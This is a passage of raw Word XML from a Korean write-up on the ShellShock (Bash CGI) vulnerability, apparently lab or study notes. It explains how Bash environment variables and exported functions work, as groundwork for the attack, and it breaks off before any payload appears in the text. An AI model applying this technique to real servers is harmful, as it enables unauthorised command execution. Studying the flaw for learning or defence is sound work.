                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)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 </w:t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>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대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DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>ShellShock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vulnerability (CGI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C165CA" w:rsidRPr="00522648" w14:paraId="799F2F6C" w14:textId="77777777" w:rsidTr="00C165CA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2C9C0CAE" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRPr="00522648" w:rsidRDefault="00C165CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41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522648">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">공격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개념</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C165CA" w:rsidRPr="00BE7966" w14:paraId="22B79C0C" w14:textId="77777777" w:rsidTr="00C165CA">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AEB359F" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165C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5C750A79" w14:textId="03B5A1A7" w:rsidR="00C165CA" w:rsidRDefault="00EE156F" w:rsidP="00C165C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4DB00CFC" wp14:editId="44856CB8">
                  <wp:extent cx="6638290" cy="1721922"/>
                  <wp:effectExtent l="0" t="0" r="0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8191" cy="1729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1FAB96" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165C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2D5FC7B4" w14:textId="289BEA7B" w:rsidR="00FF1F43" w:rsidRDefault="00EE156F" w:rsidP="00C165C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G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NU Bash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취약점은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Bash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쉘이 환경 변수를 처리하는 과정에서 발생하는데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이 과정을 이용하여 공격자는 시스템의 보안을 우회하여 명령어를 실행할 수 있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="005E590E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>즉,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환경 변수와 함께 선언되는 함수 선언과 명령어가 삽입되며 함</w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">수가 아닌 일반 환경 변수가 이전 버전의 </w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash shell</w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>에서</w:t>
            </w:r>
            <w:r w:rsidR="005E590E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>는</w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 함수로 인식</w:t>
            </w:r>
            <w:r w:rsidR="005E590E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>되어 실행된다는 것</w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>이다.</w:t>
            </w:r>
            <w:r w:rsidR="00854355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="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">이는 이전 버전의 </w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash</w:t>
            </w:r>
            <w:r w:rsidR="00854355"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 w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidR="00854355">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>을 쓰는 모든 환경에서 발생하는 취약점이다</w:t>
            </w:r>
            <w:r w:rsidR="00FF1F43">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00FF1F43">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bash-4.2.45-5.el7_0.2 </w:t>
            </w:r>
            <w:r w:rsidR="00FF1F43">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>이하 버전은 모두 해당 취약점을 갖고 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08C19943" w14:textId="43C25682" w:rsidR="00602A10" w:rsidRDefault="00602A10" w:rsidP="00C165C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이</w:t>
            </w:r>
            <w:r w:rsidR="00D47063">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 공격을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수행하기 전에</w:t>
            </w:r>
            <w:r w:rsidR="00911036"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 w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash shell</w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>에서 환경변수를 설정하는 방법과,</w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> B</w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sh </w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>프로그램 동작구조,</w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> PHP CGI </w:t>
            </w:r>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">동작 방식을 이해 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>해야한다</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00911036">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00911036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</w:p>
          <w:p w14:paraId="5C8A15F4" w14:textId="77777777" w:rsidR="00A24EE1" w:rsidRPr="00D47063" w:rsidRDefault="00A24EE1" w:rsidP="00C165C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7B740BBF" w14:textId="052E6D5C" w:rsidR="00911036" w:rsidRDefault="00911036" w:rsidP="0091103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1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. Bash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환경변수 설정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0470DE96" w14:textId="6EF328A6" w:rsidR="00DC69C9" w:rsidRDefault="00911036" w:rsidP="0091103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/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bash shell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은 특정 프로그램을 사용자가 실행할 수 있도록 유저와 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>OS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사이에서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interface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역할을 해준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이때 유저가 특정 프로그램을 실행할 때 영향을 줄 수 있는 변수를 환경변수라고 한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이러한 변수들은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>shell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을 통해 사용자가 추가 또는 삭제해줄 수 있다.</w:t>
            </w:r>
            <w:r w:rsidR="00136C54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="00136C54">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>환경변수를 설정하는 방법</w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>은 다음과 같다.</w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9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="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>변수를 저장한 뒤,</w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> export </w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">후 </w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:r w:rsidR="00DC69C9">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로 확인해보면 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC47E72" w14:textId="53613614" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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5E0598EC" w14:textId="25BD064B" w:rsidR="00911036" w:rsidRDefault="00DC69C9" w:rsidP="0091103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BC648E3" wp14:editId="4DA8BB1D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73025</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1737995" cy="723900"/>
                      <wp:effectExtent l="19050" t="19050" r="14605" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="22" name="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7995" cy="723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3D3D5" id="직사각형 22" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:2.15pt;margin-top:5.75pt;width:136.85pt;height:5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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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B79B2B" wp14:editId="5D1F336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330575</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="491490" cy="206375"/>
                      <wp:effectExtent l="19050" t="19050" r="22860" b="22225"/>
                      <wp:wrapNone/>
                      <wp:docPr id="35" name="직사각형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49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8328E" id="직사각형 35" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:2.15pt;margin-top:262.25pt;width:38.7pt;height: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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED4007F" wp14:editId="1104F262">
                  <wp:extent cx="5782272" cy="3883232"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="317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100" cy="3940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DDCB4B" w14:textId="4672CF18" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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3D7FB944" w14:textId="67F32E9B" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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774FE664" w14:textId="77777777" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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475FEF79" w14:textId="77777777" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ash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에서는 환경변수로 함수를 선언하는 것 또한 가능하다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0724B660" w14:textId="4F4694B8" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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05F7D86D" wp14:editId="05D350E7">
                  <wp:extent cx="2672080" cy="1223010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08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C44390" w14:textId="0B4FFA59" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="0091103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환경변수를 통해 정의된 함수 역시 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>export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를 해주어야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env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명령어를 통해 함수 정의를 확인할 수 있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이때 함수를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export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하려면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-f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옵션을 사용해주면 된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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>( #</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> export -f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함수이름 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F46F24" w14:textId="1F349AFC" w:rsidR="00DC69C9" w:rsidRDefault="00DC69C9" w:rsidP="00DC69C9">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="19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이렇게 함수를 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>export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해주면 현재 </w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>실행되고</w:t>
            </w:r>
            <w:r w:rsidR="0055080F"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 w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">있는 </w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서 </w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">를 추가로 실행했을 때 실행되는 </w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>subprocess bash</w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서도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해당 변수나 함수를 사용할 수 있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="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="000D411E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>에서 같은 이름의 변수와 함수를 모두 선언할 수 있다는 특징을 이용</w:t>
            </w:r>
            <w:r w:rsidR="0055080F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275F82E2" w14:textId="65A5577F" w:rsidR="00DC69C9" w:rsidRDefault="000D411E" w:rsidP="0091103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다음을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C7807E0" w14:textId="5852B714" w:rsidR="00F14072" w:rsidRDefault="00A24EE1" w:rsidP="00A24EE1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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6692C66E" wp14:editId="16D36358">
                  <wp:extent cx="2635601" cy="2244436"/>
                  <wp:effectExtent l="0" t="0" r="0" b="381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074" cy="2265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2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F6866C" wp14:editId="4696EE00">
                  <wp:extent cx="2660015" cy="2244436"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="381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494" cy="225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F9361C" w14:textId="11941FE2" w:rsidR="00C165CA" w:rsidRDefault="00F14072" w:rsidP="00F14072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t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>est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라는 이름의 변수와 함수를 선언했으며 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>env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를 통해 정상적으로 저장된 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A97DBD8" w14:textId="77777777" w:rsidR="00A24EE1" w:rsidRDefault="00A24EE1" w:rsidP="00F14072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1324D0BF" w14:textId="539F51B2" w:rsidR="00F14072" w:rsidRDefault="00F14072" w:rsidP="00F14072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이 상황에서</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 함수 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">test </w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>를</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00A24EE1"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 w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A24EE1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="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>옵션을 통해 삭제하고,</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1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="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">변수 </w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>에 다음과 같은 값을 넣어준다.</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1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="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">그리고 </w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1"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 w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">를 호출한 뒤 이를 통해 </w:t>
            </w:r>
            <w:r w:rsidR="00A24EE1">
